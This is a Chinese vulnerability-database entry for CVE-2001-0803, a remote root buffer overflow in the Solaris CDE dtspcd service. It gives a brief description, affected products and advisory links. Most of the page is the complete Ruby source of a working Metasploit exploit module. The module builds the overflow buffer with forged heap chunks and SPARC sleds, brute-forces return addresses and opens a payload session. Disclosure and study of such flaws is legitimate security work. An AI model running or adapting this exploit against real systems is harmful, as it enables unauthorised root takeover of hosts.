Sun Solaris CDE dtspcd远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106778 漏洞类型 缓冲区溢出
发布时间 2002-06-10 更新时间 2007-11-05
CVE编号 CVE-2001-0803 CNNVD-ID CNNVD-200112-068
漏洞平台 Solaris CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/9923
https://www.securityfocus.com/bid/3517
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-068
|漏洞详情
通用桌面环境(CDE)是一个可在UNIX和Linux操作系统中运行的综合的图形用户界面。CDE子进程控制服务(dtspcd)是一个从客户端接收请求,远程执行命令和启动应用程序的网络守护程序。在使用CDE的系统中,dtspcd是由互联网服务守护程序(一般是inetd或xinetd)根据CDE客户端请求而生成的。dtspcd的典型配置为以root权限在TCP/6112端口运行。dtspcd实现上存在一个缓冲区溢出漏洞,远程攻击者可以通过溢出攻击在主机上以root用户的权限执行任意指令,从而完全控制主机。dtspcd使用的一个共享库中含有一个可以远程利用的缓冲区溢出漏洞。在客户端协商过程中,dtspcd从客户端接收一个长度值和其他数据,但是没有正确地进行输入有效性检查。因此,恶意客户端可以构造并向dtspcd发送畸形数据,触发缓冲区溢出,并可能以root权限执行任意代码。
|漏洞EXP
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris dtspcd Heap Overflow',
			'Description'    => %q{
				This is a port of noir's dtspcd exploit. This module should
				work against any vulnerable version of Solaris 8 (sparc).
				The original exploit code was published in the book
				Shellcoder's Handbook.
					
			},
			'Author'         => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-0803'],
					[ 'OSVDB', '4503'],
					[ 'BID', '3517'],
					[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
					[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0d",
					'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
				},
			'Platform'       => 'solaris',
			'Arch'           => ARCH_SPARC,
			'Targets'        => 
				[
					['Solaris 8', 
						{ 'Rets' =>
							[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
						}
					],
				],
			'DisclosureDate' => 'Jul 10 2002',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(6112)
				], self.class)
	end


	def exploit
		return if not dtspcd_uname()
		
		target['Rets'][4].each do |tjmp|
			
			rbase = target['Rets'][1]
			
			while (rbase < target['Rets'][2]) do 
				break if session_created?
				begin
					print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
					attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
					break if session_created?
					
					attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
					rbase += target['Rets'][3]
				rescue EOFError
				end
			end
		end
		
		handler
		disconnect
	end
	
	def check
		return Exploit::CheckCode::Detected if dtspcd_uname()
		return Exploit::CheckCode::Safe
	end
	
	def dtspcd_uname
		spc_connect()
		spc_write(spc_register('root', "\x00"), 4)
		host, os, ver, arch = spc_read().gsub("\x00", '').split(':')
		
		return false if not host
		
		print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
		spc_write("", 2)
		return true
	end


	def chunk_create(retloc, retadd)
		"\x12\x12\x12\x12" +
		[retadd].pack('N')+
		"\x23\x23\x23\x23\xff\xff\xff\xff" +
		"\x34\x34\x34\x34\x45\x45\x45\x45" +
		"\x56\x56\x56\x56" +
		[retloc - 8].pack('N')
	end


	def attack(retloc, retadd, fcode)
		spc_connect()
		
		begin
			buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
			buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
			buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
			buf << "\x00\x00\x0f\xf4"
			buf << chunk_create(retloc, retadd)
			buf << "X" * ((0x103e - 8) - buf.length)

			spc_write(spc_register("", buf), 4)
			
			handler
			
		rescue EOFError
		rescue => e
			$stderr.puts "Error: #{e} #{e.class}"
		end
					
		
	end
	

	def spc_register(user='', buff='')
		"4 \x00#{user}\x00\x0010\x00#{buff}"
	end
	
	def spc_write(buff = '', cmd='')
		sock.put(sprintf("%08x%02x%04x%04x  %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
	end
	
	def spc_read
		# Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
		head = sock.get_once(20)
		sock.get_once( head[10, 13].hex ) || ''
	end

	def spc_connect
		disconnect
		connect
		@spc_seq = 0
	end

end
|受影响的产品
Xi Graphics Maximum CDE 1.2.3 Xi Graphics DeXtop 2.1 Sun Solaris 2.5.1 _x86 Sun Solaris 2.5.1 _ppc Sun Solaris 2.5.1 Sun Solaris 8_x86 Sun Solaris 8_sparc
|参考资料

来源:US-CERTVulnerabilityNote:VU#172583
名称:VU#172583
链接:http://www.kb.cert.org/vuls/id/172583
来源:CERT/CCAdvisory:CA-2002-01
名称:CA-2002-01
链接:http://www.cert.org/advisories/CA-2002-01.html
来源:CERT/CCAdvisory:CA-2001-31
名称:CA-2001-31
链接:http://www.cert.org/advisories/CA-2001-31.html
来源:BID
名称:3517
链接:http://www.securityfocus.com/bid/3517
来源:HP
名称:HPSBUX0111-175
链接:http://www.securityfocus.com/advisories/3651
来源:XF
名称:cde-dtspcd-bo(7396)
链接:http://xforce.iss.net/static/7396.php
来源:ISS
名称:20011112Multi-VendorBufferOverflowVulnerabilityinCDESubprocessControlService
链接:http://xforce.iss.net/alerts/advise101.php
来源:SUN
名称:00214
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/214
来源:COMPAQ
名称:SSRT541
链接:http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml
来源:CALDERA
名称:CSSA-2001-SCO.30
链接:ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/
来源:SGI
名称:20011107-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/20011107-01-P
来源:USGovernment